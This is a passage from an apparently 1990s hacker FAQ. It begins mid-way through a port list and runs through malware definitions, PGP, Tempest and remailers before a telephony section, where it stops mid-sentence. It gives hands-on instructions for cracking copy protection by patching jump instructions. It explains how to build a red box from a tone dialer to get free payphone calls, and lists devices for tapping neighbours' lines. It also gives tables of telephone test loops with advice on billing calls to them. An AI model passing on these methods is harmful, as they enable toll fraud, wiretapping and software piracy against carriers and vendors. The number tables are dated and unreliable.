rimsl 2044/tcp rimsl 2044/udp cdfunc 2045/tcp cdfunc 2045/udp sdfunc 2046/tcp sdfunc 2046/udp dls 2047/tcp dls 2047/udp dls-monitor 2048/tcp dls-monitor 2048/udp shilp 2049/tcp shilp 2049/udp www-dev 2784/tcp world wide web - development www-dev 2784/udp world wide web - development NSWS 3049/tcp NSWS 3049/ddddp rfa 4672/tcp remote file access server rfa 4672/udp remote file access server commplex-main 5000/tcp commplex-main 5000/udp commplex-link 5001/tcp commplex-link 5001/udp rfe 5002/tcp radio free ethernet rfe 5002/udp radio free ethernet rmonitor_secure 5145/tcp rmonitor_secure 5145/udp padl2sim 5236/tcp padl2sim 5236/udp sub-process 6111/tcp HP SoftBench Sub-Process Control sub-process 6111/udp HP SoftBench Sub-Process Control xdsxdm 6558/udp xdsxdm 6558/tcp afs3-fileserver 7000/tcp file server itself afs3-fileserver 7000/udp file server itself afs3-callback 7001/tcp callbacks to cache managers afs3-callback 7001/udp callbacks to cache managers afs3-prserver 7002/tcp users & groups database afs3-prserver 7002/udp users & groups database afs3-vlserver 7003/tcp volume location database afs3-vlserver 7003/udp volume location database afs3-kaserver 7004/tcp AFS/Kerberos authentication service afs3-kaserver 7004/udp AFS/Kerberos authentication service afs3-volser 7005/tcp volume managment server afs3-volser 7005/udp volume managment server afs3-errors 7006/tcp error interpretation service afs3-errors 7006/udp error interpretation service afs3-bos 7007/tcp basic overseer process afs3-bos 7007/udp basic overseer process afs3-update 7008/tcp server-to-server updater afs3-update 7008/udp server-to-server updater afs3-rmtsys 7009/tcp remote cache manager service afs3-rmtsys 7009/udp remote cache manager service man 9535/tcp man 9535/udp isode-dua 17007/tcp isode-dua 17007/udp 23. What is a trojan/worm/virus/logic bomb? This FAQ answer is excerpted from: Computer Security Basics by Deborah Russell and G.T. Gengemi Sr. Trojan: An independent program that appears to perform a useful function but that hides another unauthorized program inside it. When an authorized user performs the apparent function, the trojan horse performs the unauthorized function as well (often usurping the privileges of the user). Virus: A code fragment (not an independent program) that reproduces by attaching to another program. It may damage data directly, or it may degrade system performance by taking over system resources which are then not available to authorized users. Worm: An independent program that reproduces by copying itself from one system to another, usually over a network. Like a virus, a worm may damage data directly, or it may degrade system performance by tying up system resources and even shutting down a network. Logic Bomb: A method for releasing a system attack of some kind. It is triggered when a particular condition (e.g., a certain date or system operation) occurs. 24. How can I protect myself from virii and such? Always write protect your floppy disks when you are not purposefully writing to them. Use ATTRIB to make all of your EXE and COM files read only. This will protect you from many poorly written viruses. Scan any software that you receive with a recent copy of a good virus scanner. The best virus scanner currently available for DOS is F-Prot by Fridrik Skulason. The current version is FP-215. It is best to use more than one virus scanner. That will decrease your chances of missing a virus. Backup regularly, and keep several generations of backups on hand. If you always backup over your last backup, you may find yourself with an infected backup tape. 25. What is Cryptoxxxxxxx? This FAQ answer is excerpted from: Computer Security Basics by Deborah Russell and G.T. Gengemi Sr. A message is called either plaintext or cleartext. The process of disguising a message in such a way as to hide its substance is called encryption. An encrypted message is called ciphertext. The process of turning ciphertext back into plaintext is called decryption. The art and science of keeping messages secure is called cryptography, and it is practiced by cryptographers. Cryptanalysts are practitioners of cryptanalysis, the art and science of breaking ciphertext, i.e. seeing through the disguise. The branch of mathematics embodying both cryptography and cryptanalysis is called cryptology, and it's practitioners are called cryptologists. 26. What is PGP? This FAQ answer is excerpted from: PGP(tm) User's Guide Volume I: Essential Topics by Philip Zimmermann PGP(tm) uses public-key encryption to protect E-mail and data files. Communicate securely with people you've never met, with no secure channels needed for prior exchange of keys. PGP is well featured and fast, with sophisticated key management, digital signatures, data compression, and good ergonomic design. Pretty Good(tm) Privacy (PGP), from Phil's Pretty Good Software, is a high security cryptographic software application for MS-DOS, Unix, VAX/VMS, and other computers. PGP allows people to exchange files or messages with privacy, authentication, and convenience. Privacy means that only those intended to receive a message can read it. Authentication means that messages that appear to be from a particular person can only have originated from that person. Convenience means that privacy and authentication are provided without the hassles of managing keys associated with conventional cryptographic software. No secure channels are needed to exchange keys between users, which makes PGP much easier to use. This is because PGP is based on a powerful new technology called "public key" cryptography. PGP combines the convenience of the Rivest-Shamir-Adleman (RSA) public key cryptosystem with the speed of conventional cryptography, message digests for digital signatures, data compression before encryption, good ergonomic design, and sophisticated key management. And PGP performs the public-key functions faster than most other software implementations. PGP is public key cryptography for the masses. 27. What is Tempest? Tempest stands for Transient Electromagnetic Pulse Surveillance Technology. Computers and other electronic equipment release interference to their surrounding environment. You may observe this by placing two video monitors close together. The pictures will behave erratically until you space them apart. Although most of the time these emissions are simply annoyances, they can sometimes be very helpful. Suppose we wanted to see what project a target was working on. We could sit in a van outside her office and use sensitive electronic equipment to attempt to pick up and decipher the emanations from her video monitor. Our competitor, however, could shield the emanations from her equipment or use equipment without strong emanations. Tempest is the US Government program for evaluation and endorsement of electronic equipment that is safe from eavesdropping. 28. What is an anonymous remailer? An anonymous remailer is a system on the Internet that allows you to send e-mail anonymously or post messages to Usenet anonymously. You apply for an anonymous ID at the remailer site. Then, when you send a message to the remailer, it sends it out from your anonymous ID at the remailer. No one reading the post will know your real account name or host name. If someone sends a message to your anonymous ID, it will be forwarded to your real account by the remailer. 29. What are the addresses of some anonymous remailers? The most popular and stable anonymous remailer is anon.penet.fi, operated by Johan Helsingus. To obtain an anonymous ID, mail ping@anon.penet.fi. For assistance is obtaining an anonymous account at penet, mail help@anon.penet.fi. To see a list on anonymous remailers, finger remailer-list@kiwi.cs.berkeley.edu. 30. How do I defeat Copy Protection? There are two common methods of defeating copy protection. The first is to use a program that removes copy protection. Popular programs that do this are CopyIIPC from Central Point Software and CopyWrite from Quaid Software. The second method involves patching the copy protected program. For popular software, you may be able to locate a ready made patch. You can them apply the patch using any hex editor, such as debug or the Peter Norton's DiskEdit. If you cannot, you must patch the software yourself. Writing a patch requires a debugger, such as Soft-Ice or Sourcer. It also requires some knowledge of assembly language. Load the protected program under the debugger and watch for it to check the protection mechanism. When it does, change that portion of the code. The code can be changed from JE (Jump on Equal) or JNE (Jump On Not Equal) to JMP (Jump Unconditionally). Or the code may simply be replaced with NOP (No Operation) instructions. 31. What is 127.0.0.1? 127.0.0.1 is a loopback network connection. If you telnet, ftp, etc... to it you are connected to your own machine. Section B: Telephony ~~~~~~~~~~~~~~~~~~~~ 01. What is a Red Box? When a coin is inserted into a payphone, the payphone emits a set of tones to ACTS (Automated Coin Toll System). Red boxes work by fooling ACTS into believing you have actually put money into the phone. The red box simply plays the ACTS tones into the telephone microphone. ACTS hears those tones, and allows you to place your call. The actual tones are: Nickel Signal 1700+2200 0.060s on Dime Signal 1700+2200 0.060s on, 0.060s off, twice repeating Quarter Signal 1700+2200 33ms on, 33ms off, 5 times repeating 02. How do I build a Red Box? Red boxes are commonly manufactured from modified Radio Shack tone dialers, Hallmark greeting cards, or made from scratch from readily available electronic components. To make a Red Box from a Radio Shack 43-141 or 43-146 tone dialer, open the dialer and replace the crystal with a new one. The purpose of the new crystal is to cause the * button on your tone dialer to create a 1700Mhz and 2200Mhz tone instead of the original 941Mhz and 1209Mhz tones. The exact value of the replacement crystal should be 6.466806 to create a perfect 1700Mhz tone and 6.513698 to create a perfect 2200mhz tone. A crystal close to those values will create a tone that easily falls within the loose tolerances of ACTS. The most popular choice is the 6.5536Mhz crystal, because it is the eaiest to procure. The old crystal is the large shiny metal component labeled "3.579545Mhz." When you are finished replacing the crystal, program the P1 button with five *'s. That will simulate a quarter tone each time you press P1. 03. Where can I get a 6.5536Mhz crystal? Your best bet is a local electronics store. Radio Shack sells them, but they are overpriced and the store must order them in. This takes approximately two weeks. In addition, many Radio Shack employees do not know that this can be done. Or, you could order the crystal mail order. This introduces Shipping and Handling charges, which are usually much greater than the price of the crystal. It's best to get several people together to share the S&H cost. Or, buy five or six yourself and sell them later. Some of the places you can order crystals are: Digi-Key 701 Brooks Avenue South P.O. Box 677 Thief River Falls, MN 56701-0677 (80)344-4539 Part Number:X415-ND /* Note: 6.500Mhz and only .197 x .433 x .149! */ Part Number:X018-ND JDR Microdevices: 2233 Branham Lane San Jose, CA 95124 (800)538-5000 Part Number: 6.5536MHZ Tandy Express Order Marketing 401 NE 38th Street Fort Worth, TX 76106 (800)241-8742 Part Number: 10068625 04. Which payphones will a Red Box work on? Red Boxes will work on TelCo owned payphones, but not on COCOT's (Customer Owned Coin Operated Telephones). Red boxes work by fooling ACTS (Automated Coin Toll System) into believing you have put money into the pay phone. ACTS is the telephone company software responsible for saying "Please deposit XX cents" and listening for the coins being deposited. COCOT's do not use ACTS. On a COCOT, the pay phone itself is responsible for determining what coins have been inserted. 05. How do I make local calls with a Red Box? Payphones do not use ACTS for local calls. To use your red box for local calls, you have to fool ACTS into getting involved in the call. One way to do this, in some areas, is by dialing 10288-xxx-xxxx. This makes your call a long distance call, and brings ACTS into the picture. In other areas, you can call Directory Assistance and ask for the number of the person you are trying to reach. The operator will give you the number and then you will hear a message similar to "Your call can be completed automatically for an additional 35 cents." When this happens, you can then use ACTS tones. 06. What is a Blue Box? Blue boxes use a 2600hz tone to size control of telephone switches that use in-band signalling. The caller may then access special switch functions, with the usual purpose of making free long distance phone calls, using the tones provided by the Blue Box. 07. Do Blue Boxes still work? Blue Boxes still work in areas using in band signalling. Modern phone switches use out of band signalling. Nothing you send over the voice portion of bandwidth can control the switch. 08. What is a Black Box? A Black Box is a 1.8k ohm resistor placed across your phone line to cause the phone company equipment to be unable to detect that you have answered your telephone. People who call you will then not be billed for the telephone call. Black boxes do not work under ESS. 09. What do all the colored boxes do? Acrylic Steal Three-Way-Calling, Call Waiting and programmable Call Forwarding on old 4-wire phone systems Aqua Drain the voltage of the FBI lock-in-trace/trap-trace Beige Lineman's hand set Black Allows the calling party to not be billed for the call placed Blast Phone microphone amplifier Blotto Supposedly shorts every fone out in the immediate area Blue Emulate a true operator by seizing a trunk with a 2600hz tone Brown Create a party line from 2 phone lines Bud Tap into your neighbors phone line Chartreuse Use the electricity from your phone line Cheese Connect two phones to create a diverter Chrome Manipulate Traffic Signals by Remote Control Clear A telephone pickup coil and a small amp use to make free calls on Fortress Phones Color Line activated telephone recorder Copper Cause crosstalk interference on an extender Crimson Hold button Dark Re-route outgoing or incoming calls to another phone Dayglo Connect to your neighbors phone line Divertor Re-route outgoing or incoming calls to another phone DLOC Create a party line from 2 phone lines Gold Trace calls, tell if the call is being traced, and can change a trace Green Emulate the Coin Collect, Coin Return, and Ringback tones Infinity Remotely activated phone tap Jack Touch-Tone key pad Light In-use light Lunch AM transmitter Magenta Connect a remote phone line to another remote phone line Mauve Phone tap without cutting into a line Neon External microphone Noise Create line noise Olive External ringer Party Create a party line from 2 phone lines Pearl Tone generator Pink Create a party line from 2 phone lines Purple Telephone hold button Rainbow Kill a trace by putting 120v into the phone line (joke) Razz Tap into your neighbors phone Red Make free phone calls from pay phones by generating quarter tones Rock Add music to your phone line Scarlet Cause a neighbors phone line to have poor reception Silver Create the DTMF tones for A, B, C and D Static Keep the voltage on a phone line high Switch Add hold, indicator lights, conferencing, etc.. Tan Line activated telephone recorder Tron Reverse the phase of power to your house, causing your electric meter to run slower TV Cable "See" sound waves on your TV Urine Create a capacitative disturbance between the ring and tip wires in another's telephone headset Violet Keep a payphone from hanging up White Portable DTMF keypad Yellow Add an extension phone Box schematics may be retrieved from these FTP sites: ftp.netcom.com /pub/va/vandal (DnA) ftp.winternet.com /users/craigb (H/P) 10. What is an ANAC number? An ANAC (Automatic Number Announcement Circuit) number is a telephone number that plays back the number of the telephone that called it. ANAC numbers are convenient if you want to know the telephone number of a pair of wires. 11. What is the ANAC number for my area? How to find your ANAC number: Look up your NPA (Area Code) and try the number listed for it. If that fails, try 1 plus the number listed for it. If that fails, try the common numbers like 311, 958 and 200-222-2222. If you find the ANAC number for your area, please let us know. Note that many times the ANAC number will vary for different switches in the same city. The geographic naming on the list is not intended to be an accurate reference for coverage patterns, it is for convenience only. Many companies operate 800 number services which will read back to you the number from which you are calling. Many of these require navigating a series of menus to get the phone number you are looking for. (800)238-4959 A voice mail system (800)328-2630 A phone sex line (800)568-3197 Info Access Telephone Company's Automated Blocking Line (800)571-8859 A phone sex line (800)692-6447 (800)MY-ANI-IS (800)769-3766 Duke Power Company Automated Outage System An non-800 ANAC that works nationwide is 404-988-9664. The one catch with this number is that it must be dialed with the AT&T Carrier Access Code 10732. Another non-800 nationwide ANAC is Glen Robert of Full Disclosure Magazine's number, 10555-1-708-356-9646. Please use local ANAC numbers if you can, as abuse or overuse kills 800 ANAC numbers. NPA ANAC number Comments --- --------------- --------------------------------------------- 201 958 Hackensack/Jersey City/Newark/Paterson, NJ 202 811 District of Columbia 203 960 CT (All) 203 970 CT (All) 205 908-222-2222 Birmingham, AL 206 411 WA (Not US West) 207 958 ME (All) 209 830-2121 Stockton, CA 209 211-9779 Stockton, CA 212 958 Manhattan, NY 213 114 Los Angeles, CA 213 1223 Los Angeles, CA (Some 1AESS switches) 213 211-2345 Los Angeles, CA (English response) 213 211-2346 Los Angeles, CA (DTMF response) 213 61056 Los Angeles, CA 214 570 Dallas, TX 214 790 Dallas, TX (GTE) 214 970-222-2222 Dallas, TX 214 970-611-1111 Dallas, TX (Southwestern Bell) 215 410-xxxx Philadelphia, PA 215 511 Philadelphia, PA 215 958 Philadelphia, PA 217 200-xxx-xxxx Champaign-Urbana/Springfield, IL 219 550 Gary/Hammond/Michigan City/Southbend, IN 219 559 Gary/Hammond/Michigan City/Southbend, IN 301 958-9968 Hagerstown/Rockville, MD 305 200-222-2222 Ft. Lauderdale/Key West/Miami, FL 309 200-xxx-xxxx Peoria/Rock Island, IL 310 114 Long Beach, CA (On many GTE switches) 310 1223 Long Beach, CA (Some 1AESS switches) 310 211-2345 Long Beach, CA (English response) 310 211-2346 Long Beach, CA (DTMF response) 312 200 Chicago, IL 312 290 Chicago, IL 312 1-200-8825 Chicago, IL (Last four change rapidly) 312 1-200-555-1212 Chicago, IL 313 200-200-2002 Ann Arbor/Dearborn/Detroit, MI 313 200-222-2222 Ann Arbor/Dearborn/Detroit, MI 313 200-xxx-xxxx Ann Arbor/Dearborn/Detroit, MI 313 200200200200200 Ann Arbor/Dearborn/Detroit, MI 314 410-xxxx# Columbia/Jefferson City/St.Louis, MO 315 953 Syracuse/Utica, NY 315 958 Syracuse/Utica, NY 315 998 Syracuse/Utica, NY 317 310-222-2222 Indianapolis/Kokomo, IN 317 743-1218 Indianapolis/Kokomo, IN 401 200-200-4444 RI (All) 401 222-2222 RI (All) 402 311 Lincoln, NE 404 311 Atlanta, GA 404 940-xxx-xxxx Atlanta, GA 404 990 Atlanta, GA 405 890-7777777 Enid/Oklahoma City, OK 405 897 Enid/Oklahoma City, OK 407 200-222-2222 Orlando/West Palm Beach, FL 408 300-xxx-xxxx San Jose, CA 408 760 San Jose, CA 408 940 San Jose, CA 409 951 Beaumont/Galveston, TX 409 970-xxxx Beaumont/Galveston, TX 410 200-6969 Annapolis/Baltimore, MD 410 200-555-1212 Annapolis/Baltimore, MD 410 811 Annapolis/Baltimore, MD 412 711-6633 Pittsburgh, PA 412 711-4411 Pittsburgh, PA 412 999-xxxx Pittsburgh, PA 413 958 Pittsfield/Springfield, MA 413 200-555-5555 Pittsfield/Springfield, MA 414 330-2234 Fond du Lac/Green Bay/Milwaukee/Racine, WI 415 200-555-1212 San Francisco, CA 415 211-2111 San Francisco, CA 415 2222 San Francisco, CA 415 640 San Francisco, CA 415 760-2878 San Francisco, CA 415 7600-2222 San Francisco, CA 419 311 Toledo, OH 502 2002222222 Frankfort/Louisville/Paducah/Shelbyville, KY 502 997-555-1212 Frankfort/Louisville/Paducah/Shelbyville, KY 503 611 Portland, OR 503 999 Portland, OR (GTE) 504 99882233 Baton Rouge/New Orleans, LA 504 201-269-1111 Baton Rouge/New Orleans, LA 504 998 Baton Rouge/New Orleans, LA 504 99851-0000000000 Baton Rouge/New Orleans, LA 508 958 Fall River/New Bedford/Worchester, MA 508 200-222-1234 Fall River/New Bedford/Worchester, MA 508 200-222-2222 Fall River/New Bedford/Worchester, MA 508 26011 Fall River/New Bedford/Worchester, MA 509 560 Spokane/Walla Walla/Yakima, WA 512 830 Austin/Corpus Christi, TX 512 970-xxxx Austin/Corpus Christi, TX 515 5463 Des Moines, IA 515 811 Des Moines, IA 516 958 Hempstead/Long Island, NY 516 968 Hempstead/Long Island, NY 517 200-222-2222 Bay City/Jackson/Lansing, MI 517 200200200200200 Bay City/Jackson/Lansing, MI 518 997 Albany/Schenectady/Troy, NY 518 998 Albany/Schenectady/Troy, NY 602 593-0809 Phoenix, AZ 602 593-6017 Phoenix, AZ 602 593-7451 Phoenix, AZ 603 200-222-2222 NH (All) 606 997-555-1212 Ashland/Winchester, KY 606 711 Ashland/Winchester, KY 607 993 Binghamton/Elmira, NY 609 958 Atlantic City/Camden/Trenton/Vineland, NJ 610 958 Allentown/Reading, PA 612 511 Minneapolis/St.Paul, MN 615 200200200200200 Chatanooga/Knoxville/Nashville, TN 615 2002222222 Chatanooga/Knoxville/Nashville, TN 615 830 Nashville, TN 616 200-222-2222 Battle Creek/Grand Rapids/Kalamazoo, MI 617 200-222-1234 Boston, MA 617 200-222-2222 Boston, MA 617 200-444-4444 Boston, MA (Woburn, MA) 617 220-2622 Boston, MA 617 958 Boston, MA 618 200-xxx-xxxx Alton/Cairo/Mt.Vernon, IL 618 930 Alton/Cairo/Mt.Vernon, IL 703 811 Alexandria/Arlington/Roanoke, VA 708 1-200-555-1212 Chicago/Elgin, IL 708 1-200-8825 Chicago/Elgin, IL (Last four change rapidly) 708 356-9646 Chicago/Elgin, IL 713 970-xxxx Houston, TX 714 114 Anaheim, CA (GTE) 714 211-2121 Anaheim, CA (PacBell) 714 211-2222 Anaheim, CA (Pacbell) 716 511 Buffalo/Niagara Falls/Rochester, NY (Rochester Tel) 717 958 Harrisburg/Scranton/Wilkes-Barre, PA 718 958 Bronx/Brooklyn/Queens/Staten Island, NY 802 2-222-222-2222 Vermont (All) 802 200-222-2222 Vermont (All) 805 211-2345 Bakersfield/Santa Barbara, CA 805 211-2346 Bakersfield/Santa Barbara, CA (Returns DTMF) 805 830 Bakersfield/Santa Barbara, CA 806 970-xxxx Amarillo/Lubbock, TX 810 200200200200200 Flint/Pontiac/Southfield/Troy, MI 812 410-555-1212 Evansville, IN 813 311 Ft. Meyers/St. Petersburg/Tampa, FL 815 200-xxx-xxxx La Salle/Rockford, IL 815 290 La Salle/Rockford, IL 817 211 Ft. Worth/Waco, TX 817 970-611-1111 Ft. Worth/Waco, TX (Southwestern Bell) 818 1223 Pasadena, CA (Some 1AESS switches) 818 211-2345 Pasadena, CA (English response) 818 211-2346 Pasadena, CA (DTMF response) 906 1-200-222-2222 Marquette/Sault Ste. Marie, MI 908 958 New Brunswick, NJ 910 200 Fayetteville/Greensboro/Raleigh/Winston-Salem, NC 910 311 Fayetteville/Greensboro/Raleigh/Winston-Salem, NC 910 988 Fayetteville/Greensboro/Raleigh/Winston-Salem, NC 914 990-1111 Peekskill/Poughkeepsie/White Plains/Yonkers, NY 915 970-xxxx Abilene/El Paso, TX 919 200 Durham, NC 919 711 Durham, NC Canada: 204 644-xxxx Manitoba 306 115 Saskatchewan, Canada 403 311 Alberta, Yukon and N.W. Territory 403 908-222-2222 Alberta, Yukon and N.W. Territory 403 999 Alberta, Yukon and N.W. Territory 416 997-xxxx Toronto, Ontario 514 320-xxxx Montreal, Quebec 519 320-xxxx London, Ontario 604 1116 British Columbia, Canada 604 1211 British Columbia, Canada 604 211 British Columbia, Canada 613 320-2232 Ottawa, Ontario 705 320-4567 North Bay/Saulte Ste. Marie, Ontario Australia: +61 03-552-4111 Victoria 03 area +612 19123 All major capital cities United Kingdom: 175 12. What is a ringback number? A ringback number is a number that you call that will immediately ring the telephone from which it was called. In most instances you must call the ringback number, quickly hang up the phone for just a short moment and then let up on the switch, you will then go back off hook and hear a different tone. You may then hang up. You will be called back seconds later. 13. What is the ringback number for my area? An 'x' means insert those numbers from the phone number from which you are calling. A '?' means that the number varies from switch to switch in the area, or changes from time to time. Try all possible combinations. If the ringback for your NPA is not listed, try common ones such as 954, 957 and 958. Also, try using the numbers listed for other NPA's served by your telephone company. 201 55?-xxxx Hackensack/Jersey City/Newark/Paterson, NJ 202 958-xxxx District of Columbia 203 991-xxxx CT (All) 213 1-95x-xxxx Los Angeles, CA 219 571-xxx-xxxx Gary/Hammond/Michigan City/Southbend, IN 219 777-xxx-xxxx Gary/Hammond/Michigan City/Southbend, IN 301 579-xxxx Hagerstown/Rockville, MD 301 958-xxxx Hagerstown/Rockville, MD 303 99X-xxxx Grand Junction, CO 305 999-xxxx Ft. Lauderdale/Key West/Miami, FL 312 511-xxxx Chicago, IL 312 511-xxx-xxxx Chicago, IL 312 57?-xxxx Chicago, IL 315 98x-xxxx Syracuse/Utica, NY 317 777-xxxx Indianapolis/Kokomo, IN 317 yyy-xxxx Indianapolis/Kokomo, IN (y=3rd digit of phone number) 319 79x-xxxx Davenport/Dubuque, Iowa 401 98?-xxxx RI (All) 404 450-xxxx Atlanta, GA 407 988-xxxx Orlando/West Palm Beach, FL 412 985-xxxx Pittsburgh, PA 414 977-xxxx Fond du Lac/Green Bay/Milwaukee/Racine, WI 414 978-xxxx Fond du Lac/Green Bay/Milwaukee/Racine, WI 415 350-xxxx San Francisco, CA 417 551-xxxx Joplin/Springfield, MO 501 721-xxx-xxxx AR (All) 502 988 Frankfort/Louisville/Paducah/Shelbyville, KY 504 99x-xxxx Baton Rouge/New Orleans, LA 504 9988776655 Baton Rouge/New Orleans, LA 505 59?-xxxx New Mexico (All) 512 95X-xxxx Austin, TX 513 99?-xxxx Cincinnati/Dayton, OH 516 660-xxx-xxxx Hempstead/Long Island, NY 601 777-xxxx MS (All) 609 55?-xxxx Atlantic City/Camden/Trenton/Vineland, NJ 612 511 Minneapolis/St.Paul, MN 612 999-xxx-xxxx Minneapolis/St.Paul, MN 615 930-xxxx Chatanooga/Knoxville/Nashville, TN 616 946-xxxx Battle Creek/Grand Rapids/Kalamazoo, MI 619 331-xxxx San Diego, CA 619 332-xxxx San Diego, CA 703 958-xxxx Alexandria/Arlington/Roanoke, VA 714 330? Anaheim, CA (GTE) 714 33?-xxxx Anaheim, CA (PacBell) 716 981-xxxx Rochester, NY (Rochester Tel) 719 99x-xxxx Colorado Springs/Leadville/Pueblo, CO 801 938-xxxx Utah (All) 801 939-xxxx Utah (All) 804 260 Charlottesville/Newport News/Norfolk/Richmond, VA 805 114 Bakersfield/Santa Barbara, CA 805 980-xxxx Bakersfield/Santa Barbara, CA 810 951-xxx-xxxx Pontiac/Southfield/Troy, MI 813 711 Ft. Meyers/St. Petersburg/Tampa, FL 817 971 Ft. Worth/Waco, TX (Press 2#) 906 951-xxx-xxxx Marquette/Sault Ste. Marie, MI 908 55?-xxxx New Brunswick, NJ 908 953 New Brunswick, NJ 914 660-xxxx Peekskill/Poughkeepsie/White Plains/Yonkers, NY Canada: 416 57x-xxxx Toronto, Ontario 416 99x-xxxx Toronto, Ontario 416 999-xxx-xxxx Toronto, Ontario 514 320-xxx-xxxx Montreal, Quebec 613 999-xxx-xxxx Ottawa, Ontario 705 999-xxx-xxxx North Bay/Saulte Ste. Marie, Ontario Australia: +61 199 Brazil: 199 New Zealand: 137 Sweden: 0058 United Kingdom: 174 or 1744 or 175 14. What is a loop? This FAQ answer is excerpted from: ToneLoc v0.99 User Manual by Minor Threat & Mucho Maas Loops are a pair of phone numbers, usually consecutive, like 836-9998 and 836-9999. They are used by the phone company for testing. What good do loops do us? Well, they are cool in a few ways. Here is a simple use of loops. Each loop has two ends, a 'high' end, and a 'low' end. One end gives a (usually) constant, loud tone when it is called. The other end is silent. Loops don't usually ring either. When BOTH ends are called, the people that called each end can talk through the loop. Some loops are voice filtered and won't pass anything but a constant tone; these aren't much use to you. Here's what you can use working loops for: billing phone calls! First, call the end that gives the loud tone. Then if the operator or someone calls the other end, the tone will go quiet. Act like the phone just rang and you answered it ... say "Hello", "Allo", "Chow", "Yo", or what the fuck ever. The operator thinks that she just called you, and that's it! Now the phone bill will go to the loop, and your local RBOC will get the bill! Use this technique in moderation, or the loop may go down. Loops are probably most useful when you want to talk to someone to whom you don't want to give your phone number. 15. What is a loop in my area? Many of these loops are no longer functional. If you are local to any of these loops, please try them out an e-mail me the results of your research. NPA High Low --- -------- -------- 201 228-9929 228-9930 201 238-9929 238-9930 201 251-9929 251-9930 201 254-9929 254-9930 201 272-9929 272-9930 201 330-9929 330-9930 201 333-9929 333-9930 201 339-9929 339-9930 201 347-9929 347-9930 201 376-9929 376-9930 201 398-9929 398-9930 201 467-9929 467-9930 201 528-9929 528-9930 201 531-9929 531-9930 201 558-9929 558-9930 201 559-9929 559-9930 201 560-9929 560-9930 201 592-9929 592-9930 201 625-9929 625-9930 201 631-9929 631-9930 201 637-9929 637-9930 201 655-9929 655-9930 201 666-9929 666-9930 201 690-9929 690-9930 201 761-9929 761-9930 201 762-9929 762-9929 201 762-9929 762-9930 201 763-9929 763-9930 201 764-9929 764-9930 201 767-9929 767-9930 201 768-9929 768-9930 201 773-9929 773-9930 201 879-9929 879-9930 201 938-9929 938-9930 201 946-9929 946-9930 201 992-9929 992-9930 201 993-9929 993-9930 201 994-9929 994-9930 206 827-0018 827-0019 206 988-0020 988-0022 208 862-9996 862-9997 209 732-0044 732-0045 212 220-9977 220-9979 212 283-9977 283-9979 212 283-9977 283-9997 212 352-9900 352-9906 212 365-9977 365-9979 212 529-9900 529-9906 212 562-9977 562-9979 212 986-9977 986-9979 213 360-1118 360-1119 213 365-1118 365-1119 213 455-0002 455-XXXX 213 455-0002 455-xxxx 213 546-0002 546-XXXX 213 546-0002 546-xxxx 213 549-1118 549-1119 214 291-4759 291-4757 214 299-4759 299-4757 305 778-9952 778-9951 305 964-9951 964-9952 307 468-9999 468-9998 308 357-0004 357-0005 312 222-9973 222-9974 312 234-9973 234-9974 313 224-9996 224-9997 313 225-9996 225-9997 313 234-9996 234-9997 313 237-9996 237-9997 313 256-9996 256-9997 313 272-9996 272-9997 313 273-9996 273-9997 313 277-9996 277-9997 313 281-9996 281-9997 313 292-9996 292-9997 313 299-9996 299-9997 313 321-9996 321-9997 313 326-9996 326-9997 313 356-9996 356-9997 313 362-9996 362-9997 313 369-9996 369-9997 313 388-9996 388-9997 313 397-9996 397-9997 313 399-9996 399-9997 313 445-9996 445-9997 313 465-9996 465-9997 313 471-9996 471-9997 313 474-9996 474-9997 313 477-9996 477-9997 313 478-9996 478-9997 313 483-9996 483-9997 313 497-9996 497-9997 313 526-9996 526-9997 313 552-9996 552-9997 313 556-9996 556-9997 313 561-9996 561-9997 313 569-9996 569-9996 313 575-9996 575-9997 313 577-9996 577-9997 313 585-9996 585-9997 313 591-9996 591-9997 313 621-9996 621-9997 313 626-9996 626-9997 313 644-9996 644-9997 313 646-9996 646-9997 313 647-9996 647-9997 313 649-9996 649-9997 313 663-9996 663-9997 313 665-9996 665-9997 313 683-9996 683-9997 313 721-9996 721-9997 313 722-9996 722-9997 313 728-9996 728-9997 313 731-9996 731-9997 313 751-9996 751-9997 313 776-9996 776-9997 313 781-9996 781-9997 313 787-9996 787-9997 313 822-9996 822-9997 313 833-9996 833-9997 313 851-9996 851-9997 313 871-9996 871-9997 313 875-9996 875-9997 313 886-9996 886-9997 313 888-9996 888-9997 313 898-9996 898-9997 313 934-9996 934-9997 313 942-9996 942-9997 313 963-9996 963-9997 313 977-9996 977-9997 315 673-9995 673-9996 315 695-9995 695-9996 402 422-0001 422-0002 402 422-0003 422-0004 402 422-0005 422-0006 402 422-0007 422-0008 402 572-0003 572-0004 402 779-0004 779-0007 406 225-9902 225-9903 517 422-9996 422-9997 517 423-9996 423-9997 517 455-9996 455-9997 517 563-9996 563-9997 517 663-9996 663-9997 517 851-9996 851-9997 609 921-9929 921-9930 609 994-9929 994-9930 616 997-9996 997-9997 713 224-1499 759-1799 713 324-1499 324-1799 713 342-1499 342-1799 713 351-1499 351-1799 713 354-1499 354-1799 713 356-1499 356-1799 713 442-1499 442-1799 713 447-1499 447-1799 713 455-1499 455-1799 713 458-1499 458-1799 713 462-1499 462-1799 713 466-1499 466-1799 713 468-1499 468-1799 713 469-1499 469-1799 713 471-1499 471-1799 713 481-1499 481-1799 713 482-1499 482-1799 713 484-1499 484-1799 713 487-1499 487-1799 713 489-1499 489-1799 713 492-1499 492-1799 713 493-1499 493-1799 713 524-1499 524-1799 713 526-1499 526-1799 713 555-1499 555-1799 713 661-1499 661-1799 713 664-1499 664-1799 713 665-1499 665-1799 713 666-1499 666-1799 713 667-1499 667-1799 713 682-1499 976-1799 713 771-1499 771-1799 713 780-1499 780-1799 713 781-1499 997-1799 713 960-1499 960-1799 713 977-1499 977-1799 713 988-1499 988-1799 805 528-0044 528-0045 805 544-0044 544-0045 805 773-0044 773-0045 808 235-9907 235-9908 808 239-9907 239-9908 808 245-9907 245-9908 808 247-9907 247-9908 808 261-9907 261-9908 808 322-9907 322-9908 808 328-9907 328-9908 808 329-9907 329-9908 808 332-9907 332-9908 808 335-9907 335-9908 808 572-9907 572-9908 808 623-9907 623-9908 808 624-9907 624-9908 808 668-9907 668-9908 808 742-9907 742-9908 808 879-9907 879-9908 808 882-9907 882-9908 808 885-9907 885-9908 808 959-9907 959-9908 808 961-9907 961-9908 813 385-9971 908 776-9930 776-9930 16. What is a CNA number? CNA stands for Customer Name and Address. The CNA number is a phone number for telephone company personnel to call and get the name and address for a phone number. If a telephone lineman finds a phone line he does not recognize, he can use the ANI number to find it's phone number and then call the CNA operator to see who owns it and where they live. Normal CNA numbers are available only to telephone company personnel. Private citizens may legally get CNA information from private companies. Two such companies are: Unidirectory (900)933-3330 Telename (900)884-1212 Note that these are 900 numbers, and will cost you approximately one dollar per minute. If 